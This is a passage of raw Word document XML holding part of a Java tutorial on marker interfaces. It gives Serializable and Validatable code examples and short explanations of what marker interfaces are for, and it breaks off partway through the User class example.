      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5B140"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D8C43"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AC008"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845B6A3"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37284C2B" w14:textId="6D1C2751"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9CFD8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">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In the above example, Serializable is a marker interface. It does not contain any methods, but a class that implements it (like MyClass) is considered to have a special behavior related to serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F074147" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose of Marker Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FEFED" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Indicating a special behavior or property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marker interfaces are used to provide metadata that the class has a specific capability. This is particularly useful in cases where you want the class to be handled differently based on its "marked" behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84143E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enabling custom handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: A marker interface allows certain objects to be handled in a special way by other parts of the application, such as enabling serialization or cloning behavior. For example, the Serializable interface is a marker interface used by the Java serialization mechanism to mark classes that can be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59094A64" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Type-safe operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Since the marker interface doesn't define any methods, it doesn't enforce any specific behavior. However, its presence allows you to safely check if an object has a certain capability. For example, you can use instanceof to check if a class implements a marker interface, and then decide how to handle it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5477BD30" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example of Using Marker Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D8F91"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F95EFA"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validatable</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD8A96"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// No methods here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547AA0BD"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75636C"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55743499"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Class implementing the marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612AFEA"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validatable</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F39825"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20B21D"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DC0F4"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
